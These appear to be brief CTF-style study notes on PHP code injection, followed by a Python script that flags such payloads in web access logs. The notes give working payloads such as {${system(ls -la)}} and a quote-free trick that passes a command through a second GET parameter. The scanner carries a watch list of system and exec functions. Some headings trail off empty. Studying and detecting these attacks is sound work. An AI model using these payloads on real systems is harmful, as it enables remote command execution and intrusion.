PHP code injection
Remember, this is “code” injection.
Look for payloads that are the same as, or close to, the ones in a Burp scan report, and change the values.
1) {${sleep(hexdec(dechex(20)))}} (Burp)
2) {${sleep(10)}}
3) {${system(ls -la)}}
easy ;)
Again, read up on the PHP functions: system, exec, ….
Sometimes, like with SQL, use ‘ or ”.
Google everything.
However, remember that double quotes are being sanitized? Therefore, we can use another way by reading the value from a variable which in this case is reading input from another GET parameter. Since $_GET is a dictionary, the key can be a number. So we can set the 2nd parameter to be 1=ls or 0=ls, etc, and read it using $_GET[1] or $_GET[0] respectively.
The GET parameter is given to us by the HTML form :)
/?format=${system($_GET[1])}&1=ls
Therefore, our exploit URL should be (+ means <space> in URL encoding):
If it is filtered
The file in the / directory
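A detection-side view of the payloads above, as an added example that is not part of the original notes: it URL-decodes the query string of each access-log line and flags values that contain a ${func( interpolated call or a $_GET[n] reference whose carrier parameter arrives in the same request. The log lines, the function names inspect_request and scan_log, and the watch list are constructed for illustration.

```python
import re
from urllib.parse import urlsplit, parse_qsl

# PHP "complex" interpolation that calls a function: ${name( or {${name(
INTERP_CALL = re.compile(r"\$\{\s*([A-Za-z_]\w*)\s*\(")
# A value that pulls its argument from another request parameter, e.g. $_GET[1]
SUPERGLOBAL_REF = re.compile(r"\$_(?:GET|POST|REQUEST|COOKIE)\[\s*['\"]?(\w+)['\"]?\s*\]")
# Functions named in the notes plus close relatives (assumed watch list)
WATCHED = {"system", "exec", "shell_exec", "passthru", "popen",
           "proc_open", "eval", "assert", "sleep"}
# Request line inside a combined-log-format entry
REQUEST_LINE = re.compile(r'"(?:GET|POST|HEAD) (\S+) HTTP/[\d.]+"')

def inspect_request(request_target):
    """Return findings for one request target (path + query string)."""
    params = parse_qsl(urlsplit(request_target).query, keep_blank_values=True)
    names = {key for key, _ in params}
    findings = []
    for key, value in params:  # values are already URL-decoded by parse_qsl
        for m in INTERP_CALL.finditer(value):
            func = m.group(1).lower()
            level = "high" if func in WATCHED else "medium"
            findings.append((level, key, f"interpolated call to {func}()"))
        for m in SUPERGLOBAL_REF.finditer(value):
            ref = m.group(1)
            note = f"reads parameter {ref!r} via superglobal"
            if ref in names:
                # Quote-free trick from the notes: argument carried in a 2nd parameter
                note += " (carrier parameter present in same request)"
            findings.append(("high", key, note))
    return findings

def scan_log(lines):
    """Yield (line_no, findings) for log lines whose request has findings."""
    for no, line in enumerate(lines, 1):
        m = REQUEST_LINE.search(line)
        if m and (found := inspect_request(m.group(1))):
            yield no, found

# Constructed sample log lines (not real traffic)
SAMPLE = [
    '203.0.113.5 - - [01/Jan/2024:10:00:00 +0000] "GET /?format=json HTTP/1.1" 200 512',
    '203.0.113.5 - - [01/Jan/2024:10:00:05 +0000] "GET /?format=%7B%24%7Bsleep(10)%7D%7D HTTP/1.1" 200 512',
    '203.0.113.5 - - [01/Jan/2024:10:00:09 +0000] "GET /?format=${system($_GET[1])}&1=ls HTTP/1.1" 200 2048',
]

if __name__ == "__main__":
    for no, found in scan_log(SAMPLE):
        print(no, found)
```

Because the second and third sample requests contain no quote characters at all, a filter that only strips quotes passes them through unchanged, which is why the check keys on the interpolation syntax instead.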